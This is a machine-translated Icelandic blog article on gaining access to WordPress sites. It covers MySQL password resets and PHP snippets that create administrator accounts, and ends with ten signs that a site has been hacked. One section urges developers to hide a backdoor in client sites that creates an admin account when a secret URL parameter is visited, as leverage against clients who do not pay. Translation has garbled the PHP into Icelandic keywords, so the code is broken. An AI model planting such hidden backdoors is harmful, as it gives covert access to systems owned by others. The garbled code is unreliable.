Hvernig á að hakka inn á WordPress vefsíðu, heildarvísinn

Hvernig á að hakka inn á WordPress vefsíðu, heildarhandbókina


Við þolum ekki, samþykkjum né hvetjum til neinnar ólöglegrar eða illgjarn hegðunar! Tilgangurinn með þessari grein er að útskýra hvernig á að hakka eða fá aftur aðgang að WordPress síðu sem tilheyrir þér, eða að þú hefur réttindi til að breyta, stjórna og fá aðgang. Hvað sem þú gerir, þá gerirðu það á eigin spýtur. Við berum ekki ábyrgð á aðgerðum þínum. Þessi handbók er eingöngu ætluð til fræðslu.

Lýstar aðferðir munu hjálpa þér að fá aftur aðgang að vefnum, jafnvel þó að þú sért ekki lengur með reikning, en krefst smá upplýsinga um vefinn og þær hjálpa þér ekki að reiðhestast í einhverri handahófi WordPress uppsetningu.

Í þessari handbók erum við að fara að sýna þér:

  • Hvernig á að hakka inn á WordPress vefsíðu
  • Hvernig á að búa til afturdyr í WordPress
  • Hvernig á að stofna nýjan notendareikning í gegnum FTP
  • 10 skilti á WordPress síðuna þína er tölvusnápur

Hvernig á að hakka inn á WordPress vefsíðu, heildarhandbókina

Aðstæður sem þú getur hjálpað þér við

Ef þú ert í einni af eftirtöldum aðstæðum, munu aðferðir okkar hjálpa þér að ná aftur aðgangi:

  • þú gleymdir notandanafninu eða netfanginu
  • valkostur til að endurstilla lykilorð virkar ekki á hýsingarþjóninum
  • endurstilla tölvupóst með lykilorði er ekki að komast í gegnum
  • þú hefur ekki lengur aðgang að netfangi reikningsins
  • þú veist notandanafn og lykilorð, en samsetningin virkar bara ekki

Til að nota aðferðirnar sem lýst er hér að neðan þarftu aðeins eitt af eftirfarandi:

  • FTP aðgangur að netþjóninum, eða
  • cPanel aðgang að netþjóninum, eða
  • aðgang að MySQL gagnagrunninum og getu til að tengjast honum lítillega

Aðferð # 1 – MySQL leiðin

Notaðu þessa aðferð til að breyta lykilorðinu (eða notandanafninu ef þess er þörf) fyrir núverandi notanda eða til að búa til nýjan reikning. Þú þarft cPanel aðgang eða beinan MySQL aðgang að gagnagrunni vefsins. Byrjum á því að breyta lykilorði núverandi notanda.

Ef þú ert að nota cPanel, skráðu þig inn (alltaf er hægt að nálgast cPanel í gegnum https://yoursite.com:2083 tengill), finndu og opnaðu phpMyAdmin. Listinn yfir gagnagrunna og töflur er til vinstri. Þú ert að leita að töflunni sem endar í _notendur. Það verður líklega wp_users, en ef þú ert með fleiri en eina WordPress síðu uppsettan á netþjóninum þarftu að finna réttu.

Hægri taflan hefur notandann sem þú vilt breyta í honum. Fylgdu sömu aðferð ef þú ert að tengjast MySQL í gegnum einhvern utanaðkomandi viðskiptavin eins og SQLyog. Þegar þú hefur fundið töfluna og raunverulega notendaskrá, þá er kominn tími til að breyta lykilorðinu.

Eins og þú hefur líklega áttað þig á núna er lykilorðið vistað í user_pass reit, flýtt með MD5 reikniritinu. Opnaðu MD5 rafall á netinu sláðu inn lykilorðið sem þú vilt nota og smelltu á „Hash“. Afritaðu myndaða strenginn og settu upprunalega lykilorðið út með því. Í phpMyAdmin geturðu breytt reitnum með því að tvísmella á hann. Aðferðin er svipuð hjá öðrum MySQL viðskiptavinum. Vistaðu breytingar og skráðu þig inn á WordPress með nýja lykilorðinu þínu.

Notendur borð WP

Notendanöfn, flýtt lykilorð og tölvupóstur eru vistaðir í wp_users gagnagrunnstöflu

Enn á aðferð # 1 – að búa til nýjan notanda

Að búa til nýjan notanda er aðeins flóknara en samt viðráðanlegt á innan við mínútu. Búðu til nýja skrá í notendatöflu og byggja: user_login, user_pass (hashed, með því að nota MD5 aðgerðina sem lýst er hér að ofan) og user_email. Allir aðrir reitir geta verið tómir; þeir skipta ekki máli. Vistaðu nýju metið. Þegar það hefur verið vistað mun MySQL gefa það einstakt auðkenni. Það er númerið í ID reitnum. Mundu það.

Farðu nú til _usermeta borð. Mundu, forskeyti töflunnar verður að vera það sama og notandinn. Til dæmis wp_users og wp_usersmeta. Ef forskeytið er ekki það sama, ertu að breyta röngri töflu (af einhverri annarri uppsetningu WP) og nýi reikningurinn virkar ekki. Við munum búa til tvær nýjar skrár. Hunsa umeta_id reit fyrir þau bæði. Setja notandanafn reitinn að gildinu sem þú bara munaðir eftir (nýja ID gildi í notendatöflu). Fyrir fyrsta met sett meta_lykill að wpct_user_level og meta_gildi að 10. Fyrir seinni meta_lykill að wpct_capabilities og meta_gildi að a: 1: {s: 13: "stjórnandi"; b: 1;}. Vista bæði. Þú ert búinn – skráðu þig inn!

Aðferð # 2 – aðgerðirnar

Þessa aðferð er hægt að nota annað hvort með því að breyta features.php í gegnum cPanel eða með því að nota FTP viðskiptavin til að gera það. Ef þú notar cPanel skaltu finna File Manager og opna það. Í fyrsta lagi verðum við að finna möppu virka þemans.

Fara til public_html / wp_content / þemu möppu. Ef þú sérð þemað strax og veist hvaða það er – frábært. Opnaðu möppuna og byrjaðu að breyta aðgerðir.php. Ef ekki, opnaðu síðuna, hægrismelltu hvar sem er, veldu „Skoða heimildir“. Ýttu síðan á Ctrl + F og byrjaðu að slá / þemu / brátt muntu hafa mikið af vefslóðum auðkennt og þú þekkir nafn möppunnar á virka þemað.

Finndu það í skráarsamsetningunni, opnaðu og byrjaðu að breyta aðgerðir.php. Afritaðu / límdu eftirfarandi kóða í lok skjalsins. Hugaðu að lokuninni ?> PHP tags ef þú ert með þau. Þeir verða að vera í síðustu línunni. Settu svo kóðann á undan þeim.

$ new_user_email = '[email protected]';
$ new_user_password = '12345';

ef (! notandanafn_ er til ($ new_user_email)) {
$ user_id = wp_create_user ($ new_user_email, $ new_user_password, $ new_user_email);

wp_update_user (fylki ('ID' => $ user_id, 'gælunafn' => $ new_user_email));

$ notandi = nýr WP_User ($ user_id);
$ notandi-> set_role ('stjórnandi');
}

Breyttu aðeins fyrstu tveimur línum kóðans til að endurspegla nýjan reikning. Ef það er þegar notandi í WP með þann tölvupóst verður ekki búið til nýjan reikning, svo vertu viss um að hann sé nýr. Breyttu lykilorðinu líka – ekki tölvusnápur af handritsnillingum. Eftir að þú hefur vistað skrána skaltu einfaldlega opna síðuna þína, kóðinn verður keyrður, nýr reikningur með stjórnandi forréttindi búin til og þú munt geta skráð þig inn með það.

Eftir að þú hefur gert það, mundu að eyða kóðanum úr aðgerðir.php.

Aðrar reiðhestur

Með því að þekkja FTP, cPanel eða MySQL lykilorð ertu að sanna að þú hafir lögmætan aðgangsrétt að netþjóninum og ættir að hafa aðgang að WordPress uppsetningunni líka. Ef þú ert ekki með neina af þessum reikningum, þá hefurðu enga gagn (reiðhestur inn á vefsíður annarra), og það er ekki gott!

Vinsamlegast mundu að það er alvarlegur glæpur að fá óleyfilegan aðgang að tölvum, vefsvæðum eða netþjónum og það er brugðist strax við í flestum löndum.

Ef þú ert hræddur um að hægt sé að hakka WordPress síðuna þína, vinsamlegast athugaðu þessa síðu með ókeypis WordPress öryggisskanni. Ef þú hefur ekki tíma til að setja upp bloggið þitt, láttu okkur gera það fyrir þig.

Hvernig á að búa til afturdyr í WordPress

Þegar útidyrnar eru lokaðar gætirðu prófað bakdyrnar. Þetta gæti hljómað eins og skaðleg leið til að nota kóðann til að fara inn á vefinn án þess að hafa aðgang að honum, en það eru í raun tímar þar sem þú þarft að stjórna eigin síðu ef einhver stal henni.

Ef það er að búa til vefsíður fyrir annað fólk eitthvað sem þú gerir, mun fyrr eða síðar vera viðskiptavinur sem neitar að greiða þér fyrir vinnu þína; viðskiptavinur sem mun eyða innskráningarupplýsingunum þínum og taka við stjórn á öllu því sem þú hefur gert. Stundum dugar það að búa til nýjan notanda í gegnum FTP eða til að endurstilla lykilorð. Þegar það er ekki nóg, gætirðu viljað hampa þér aftur inn eða búa til aðgang að hurðinni að stjórnarsíðunum þínum.

En ef þú ákveður að fela lítið stykki af kóða í WordPress umhverfi þínu gætirðu bjargað þér einhverja reisn og fá aðgang að WordPress vefnum með forréttinda stjórnanda. Og það er þar sem leikirnir byrja.

Sama hversu oft þessi þjófur eyðir upplýsingum þínum eða endurheimtir öryggisafrit á netþjóni sem hann á sennilega, þá er möguleiki á að hann viti ekki neitt um innganga í útidyrunum. Ef hann gerði það myndi hann líklega ekki einu sinni þurfa hjálp þína við að setja upp WordPress, ekki satt?

Búðu til afturdyr:

OK, nóg með ræðuna; hérna er kóðinn sem þú þarft til að fá starfið:

  1. Opnaðu function.php skrána
  2. Afritaðu / límdu eftirfarandi kóða:
  3. add_action ('wp_head', 'wploop_backdoor');
    fall wploop_backdoor () {
    Ef ($ _GET ['backdoor'] == 'knockknock') {
    krefjast ('wp-include / registry.php');
    Ef (! Notandanafn er til ('notandanafn')) {
    $ user_id = wp_create_user ('nafn', 'framhjá');
    $ notandi = nýr WP_User ($ user_id);
    $ notandi-> set_role ('stjórnandi');
    }
    }
    }
    ?>
  4. Vista breytingar

Ef þú skilur kóðann eins og hann er, allt sem þú þarft að gera til að búa til nýjan stjórnanda á vefnum er heimsókn http://www.yourdomain.com/?backdoor=knockknock

Eftir að síðunni var hlaðið er nýja notandanafnið þitt “Nafn” og lykilorð „Standast“.

Auðvitað, þú getur breytt því í kóðanum hér að ofan með því að breyta ‘nafni’ og ‘standast’ við hvað sem þú vilt. Þú getur einnig breytt hlekknum á bakdyrnar þínar með því að breyta „afturhurð“ og / eða „banka úr“ fyrir allt sem þú kemur upp með.

Prófaðu aðgerðina – ekki aðeins hún er skemmtileg heldur getur hún virkilega hjálpað þér einhvern tíma í framtíðinni þegar þú ert að fara að búa til vefsíðu fyrir einhvern sem þú getur ekki treyst fullkomlega. Þú ættir einnig að jafna WordPress og bloggfærni þína.

Hvernig á að stofna nýjan notendareikning í gegnum FTP

Það er mjög auðvelt að búa til nýja notendareikninga á WordPress. Sem stjórnandi þarftu að gera það farðu til Admin síðu þar sem þú getur búið til nýjan reikning fyrir hvaða notendahlutverk sem er. Það er hægt að gera á nokkrum sekúndum og nýstofnaður notandi getur strax skráð sig inn með gefið notendanafn og lykilorð.

En hvað gerist ef þú missir aðgang að WordPress stjórnanda þínum? Hlutirnir gætu orðið aðeins flóknari, en ekki hafa áhyggjur – við höfum aðgerð fyrir þig sem getur bjargað stjórnanda lífi þínu.

Hvort annar stjórnandi hafi eytt reikningnum þínum, hvort sem þú hefur eytt öllum notendum úr gagnagrunninum fyrir mistök, notað bilað viðbót eða fengið tölvusnápur, þá geturðu samt komist aftur í stjórn. Stundum gætir þú aðeins fengið aðgang að FTP netþjónnum þínum á meðan HTTP einn verður ekki fyrir hendi og þú verður að búa til nýjan stjórnanda. Þó að þetta gæti verið sjaldgæft tilfelli, þá bjargar eftirfarandi aðgerð þér.

Til að búa til nýjan reikning utan WordPress admin umhverfi, allt sem þú þarft er FTP aðgangur að síðunni þinni. Sem stjórnandi ættirðu að hafa allar nauðsynlegar upplýsingar til að skrá þig inn á netþjóninn þinn og þú getur fljótt stofnað nýjan reikning með því að búa til nýja aðgerð í þemað.

Búðu til nýjan notendareikning í gegnum FTP:

  1. Opnaðu FTP viðskiptavin og tengdu reikninginn þinn
  2. Siglaðu að wp-innihaldi / þemum
  3. Opnaðu möppuna með þemað sem þú ert að nota
  4. Leitaðu að funct.php skránni og breyttu henni
  5. Afritaðu og límdu eftirfarandi aðgerð:
  6. fall admin_account () {
    $ user = 'Notandanafn';
    $ pass = 'Lykilorð';
    $ email = '[email protected]';
    ef (! notendanafn_exists ($ notandi) &&! email_exists ($ email)) {
    $ user_id = wp_create_user ($ user, $ pass, $ email);
    $ notandi = nýr WP_User ($ user_id);
    $ notandi-> set_role ('stjórnandi');
    }}
    add_action ('init', 'admin_account');
    
  7. Breyta notendanafni, lykilorði og tölvupósti í eitthvað einstakt
  8. Vista breytingar

Gakktu úr skugga um að notandanafn, lykilorð og netfang sem þú stillir í aðgerðinni séu einstök eða að öðrum kosti virkar aðgerðin ekki rétt. Þegar þú hefur vistað breytingarnar ertu búinn og þú getur farið í innskráningarpallinn þinn á WP. Notaðu nýjar upplýsingar til að skrá þig inn aftur og þegar þú hefur staðfest reikninginn geturðu eytt aðgerðinni úr funct.php skránni.

Aðgerðin sem sýnd er hér að ofan býr til stjórnendareikning en þú getur auðveldlega breytt honum til að búa til reikning með einhverju öðru notendahlutverki. Einfaldlega breyttu hlutverki þann 8þ röð af kóðanum til ritstjórans, höfundarins, framlagsins, áskrifandans eða annars notendahlutverks sem þú hefur búið til.

Því miður, ef þú hefur misst stjórnandareikninginn þinn, þá hefurðu einnig tapað öllum færslunum sem skrifaðar voru undir því notandanafni. Þess vegna ættir þú alltaf að halda afriti sem þú getur auðveldlega sótt. Ef þú ert að lesa þetta á meðan þú ert með adminareikninginn þinn, taka þetta sem áminningu um að búa til öryggisafrit strax og bókamerki þessa grein ef þú þarft að stofna reikning utan WordPress í framtíðinni.

10 skilti á WordPress síðuna þína er tölvusnápur

WordPress er gríðarlegur bloggvettvangur. Það eru milljónir notenda og svo virðist sem fjöldinn fari ört vaxandi á hverjum degi. Fólk hefur jafnvel tilhneigingu til að flytja vefsíður sínar sem eru búnar til í öðrum innihaldsstjórnunarkerfum yfir í þetta opna uppsprettukerfi oftar en þú heldur. Og þó að þetta sé gott þýðir þetta það tölvusnápur mun einnig setja WordPress á númer eitt þegar þeir reyna að ráðast inn á handahófi síður.

Venjulega, ef þú verður tölvusnápur, munt þú vita um það samstundis. Síðan þín verður óaðgengileg; þú getur ekki skráð þig inn og stundum mun tölvusnápur jafnvel skilja eftir skilaboð á forsíðunni. En oftar en ekki, þú gætir ekki einu sinni tekið eftir því að eitthvað hefur breyst. Í þessum hluta greinarinnar erum við að fara að sýna þér nokkur merki sem gætu sýnt þér að WordPress vefsvæðið þitt var hakkað og nokkrar lausnir á vandanum.

1. Mistókst innskráning

Þetta merki er nokkurn veginn áberandi. Ef þú hefur notað notendanafn og lykilorð samsetningu í nokkurn tíma án þess að eiga í vandræðum, gætirðu orðið grunsamlegur ef WordPress kannast ekki skyndilega við reikninginn þinn. Ef tölvusnápur fékk að skrá sig inn á síðuna þína eru líkurnar á því að hann breyti stjórnunarréttindum þínum fljótt.

Kannski fékk hann að breyta lykilorðinu þínu eða eyða reikningnum þínum alveg. Áður en þú byrjar að örvænta eftir að WordPress skilaboð eru í fyrsta skipti um rangt notandanafn / lykilorð, vinsamlegast hafðu þá í huga að þú gætir hafa slegið ranga samsetningu eða að þú hafir kveikt á hnappalásarhnappinum.

Lausn: Prófaðu að endurheimta lykilorðið með tölvupósti eða notaðu annan reikning til að skrá þig inn aftur. Til að ganga úr skugga um að þú skráir þig áfram öruggur mælum við með að setja upp Innskráning Ninja viðbót fyrir WordPress.

2. Illgjarnu efni er bætt við síðuna þína

Þessi síða inniheldur malware viðvörun

Ef þú byrjar að taka eftir ókunnu efni á síðunni þinni gætirðu byrjað að hafa áhyggjur. Þegar þeir fá tækifæri til að fá aðgang að stjórnandasvæðinu þínu, tölvusnápur mun geta breytt kjarna þinni og bæði þemu og tappi skrám. Það þýðir að þeir fá að breyta öllu sem þeir vilja.

Þó að einhverjir tölvuþrjótar muni breyta útliti vefsvæðisins á harkalegan hátt og jafnvel stafa af því að þú hafir verið tölvusnápur, þá verða hinir mun lúmskari um það.

Lausn: Prófaðu að leita að duldu efni í vefsíðukóðanum. Það gætu verið hlekkir á tölvusnápur á illgjarn vefsvæði sem gróðursettur er í fótinn á síðunni þinni, eða þeir gætu hafa sett upp sprettiglugga sem opnast reglulega fyrir viðskiptavini þína. Notaðu Security Ninja til að skanna síðuna þína eða fylgjast stöðugt með síðunni þinni vegna slíkra vandamála.

3. Grunsamlegar heimsóknir

Ef þú ert ekki að rekja vefsíðuna þína ættir þú að byrja á því strax. Einföld leið til að gera er að nota Google Analytics sem, meðal margra annarra aðgerða, getur sagt þér hversu margar heimsóknir þú færð og hvaðan koma þessar heimsóknir. Eftir nokkurn tíma kynnist þú vefsíðunni þinni. Það þýðir að þú munt vita hvaðan heimsóknirnar koma, þú munt vita hvenær þú setur af stað nýja herferð og hvenær nýir kynningartenglar eru gefnir út í náttúrunni.

En ef þú tekur skyndilega eftir því að vefsvæðið þitt fær mikla fjölda nýrra heimsókna frá grunsamlega léninu, þú vilt rannsaka þetta frekar vegna þess að vefsvæðið þitt gæti bara orðið tölvusnápur. Venjulega mun slíkar heimsóknir leiða til 100% hopphlutfalls sem þýðir að aðeins ein síða var skoðuð. Tölvusnápur mun oft nota sjálfvirk kerfi sem munu leiða aðrar slæmar síður til þín. Hvort sem það er slæmur kóði sem keyrður er á síðuna þína eða þú ert orðinn hluti af ruslnetakerfi geta hlutirnir orðið alvarlegir og þú verður að athuga hvort það sé illgjarn kóða á vefsvæðinu þínu.

Lausn: Notaðu Google vefstjóraverkfæri til að finna grunsamlega lén

4. Skyndileg samdráttur í umferðinni

Örugg vefskoðun staða

Ólíkt því síðastnefnda merki um að verða tölvusnápur gæti þessi tilkynnt þér vegna þess að skyndilega er fækkun heimsókna. Í stað þess að vísa nýjum heimsóknum til þín, tölvusnápur gæti sent heimsóknir frá vefsvæðinu þínu. Þetta gæti gerst vegna þess að tölvusnápur vísaði vefsvæðinu þínu yfir á annað. Hin ástæðan fyrir því að fá færri gesti er sú að Google svartlistaði síðuna þína. Þessi aðgerð sýnir skilaboð til allra notenda sem kunna að velja að opna ekki síðuna þína vegna þess að hún er sýkt.

Lausn: Notaðu Google Staða fyrir örugga vefskoðun til að athuga hvort vefsvæðið þitt sé merkt sem óöruggt og sé hættulegt að heimsækja þessa stundina.

5. Niðurstöður leitarvéla eru undarlegar

Ef þú hefur ekki tekið eftir neinum breytingum á síðunni þinni, en þú kemst að því að leitarniðurstöður á Google og öðrum leitarvélum eru undarlegar (sýna mismunandi titla og önnur metagögn) gæti þetta verið skýrt merki um tölvusnápur. Tölvusnápur gæti hafa breytt innihaldi þínu á þann hátt sem aðeins er sýnilegt sérfræðingi. Samt væri breytingin sýnileg í niðurstöðum leitarvélarinnar.

Lausn: Athugaðu síðuna þína með Google vefstjóraverkfæri, og athugaðu hvort vefurinn þinn hafi verið tölvusnápur með þessu ókeypis tól á netinu.

6. Þú getur ekki sent / tekið á móti tölvupósti

Þegar tölvusnápur fær aðgang að síðunni þinni vill hann líklega gera það notaðu netþjóninn þinn til að spamma alla aðra. Þegar þú kemst að því að þú getur ekki sent eða tekið á móti nýjum tölvupósti frá WordPress þínum getur þetta verið skýrt merki um að þú hafir verið tölvusnápur. Athugaðu tölvupóstinn þinn enn og aftur og skoðaðu þá við símafyrirtækið þitt til að ganga úr skugga um að það séu engar villur.

Lausn: Prófaðu WordPress þinn póstaðgerð með þessu ókeypis tappi.

7. Vefsvæði er ekki til

Miðlarinn fannst ekki

Það eru tímar þar sem tölvusnápur hefur ekki aðgang að vefsvæðinu þínu til að planta skaðlegum kóða, beina notendum eða nota tölvupóstinn þinn fyrir ruslpóst. Stundum, allt sem þeir vilja gera er að hrapa síðuna þína. Sjaldan, tölvusnápur mun eyða öllu af öllum netþjóninum. Þess vegna er mikilvægt að þú hýsir skrárnar þínar hjá þekktu hýsingarfyrirtæki sem mun taka öryggi og geyma einnig daglega eða að minnsta kosti vikulega afrit af vefsíðunni þinni. Það er góð venja að gera líka eigin afrit af og til svo hægt sé að endurheimta síðuna fljótt.

Lausn: Settu upp eitt besta viðbætið fyrir öryggisafritun í WordPress.

8. Grunsamlegar skrár

Svipað og skaðlegt efni sem má bæta við núverandi skrár, tölvusnápur gæti plantað auka skrám hvar sem er í rótarmöppunni þinni. Það er gott að vita um WordPress, en ef þú ert ekki með reynslu, þá ættir þú að hafa öryggistæki til ráðstöfunar sem getur skoðað allar skrár og athafnir þínar. Nýlega skoðuðum við Öryggis Ninja sem er fullkomið tæki til að athuga allar WordPress skrárnar þínar.

Lausn: Prófaðu að leita að skrám sem ekki tilheyra WordPress uppsetningunni þinni. Notaðu Security Ninja til að skanna síðuna þína reglulega og finna þessar skrár sjálfkrafa. Síðan skaltu eyða skrámunum eða fjarlægja skaðlegan kóða úr sýktum skrám. Ekki gleyma Core Scanner viðbótinni fyrir Security Ninja.

9. Nýir félagar

Það fer eftir vefsíðu þinni, þú gætir verið sá eini sem getur bætt við nýjum meðlimum. Í því tilfelli gæti tölvupóstur sem segir þér frá nýskráðum notendum kallað á viðvörun. Ef það eru aðrir stjórnendur sem hafa getu til að bæta við nýjum meðlimum, hafðu þá samband við þá um grunsamlega virkni.

Lausn: Breyttu innskráningar URL með ókeypis viðbót, takmarkaðu aðgang að WordPress innskráningarsíðunni þinni með því að nota .htpasswd skrána og notaðu Login Ninja til að vernda innskráningarformið þitt allan tímann.

10. Skoðaðu áætlaða atburði á netþjóninum þínum

Stundum mun tölvusnápur ekki gera neitt við vefsíðuna þína þegar þeir finna leið inn. Í staðinn, þeir munu yfirgefa áætlaða viðburði sem getur skaðað síðuna þína einhvern tíma í framtíðinni. Þessi tækni er hættuleg vegna þess að spjallþráð getur skilið óreyndur fórnarlamb eftir að vera óheppinn í fyrstu. Þú gætir smitast og veist ekkert um það.

Lausn: Athugaðu CRON störfin þín á netþjóninum sem þú ert að nota og vertu viss um að það séu engin grunsamleg áætluð verkefni.

Klára

Við vonum að þessi grein hjálpi þér að stjórna jafnvel öruggari WordPress síðu og að hún muni hjálpa þér að fá aftur aðgang að henni við slæmar aðstæður. Og jafnvel þó að vefsíðan þín sé hrein, vinsamlegast ekki taka það sem sjálfsögðum hlut.
Vertu alltaf viss um að bloggið þitt sé eins öruggt og það getur verið. Við mælum með öryggisviðbót fyrir WordPress sem getur bjargað þér á flestum stundum. Vertu samt ekki sá sem notar óöruggt lykilorð og vertu varkár þegar þú ræðst inn á þína eigin WordPress síðu.
Jeffrey Wilson Administrator
Sorry! The Author has not filled his profile.
follow me
    Like this post? Please share to your friends:
    Adblock
    detector
    map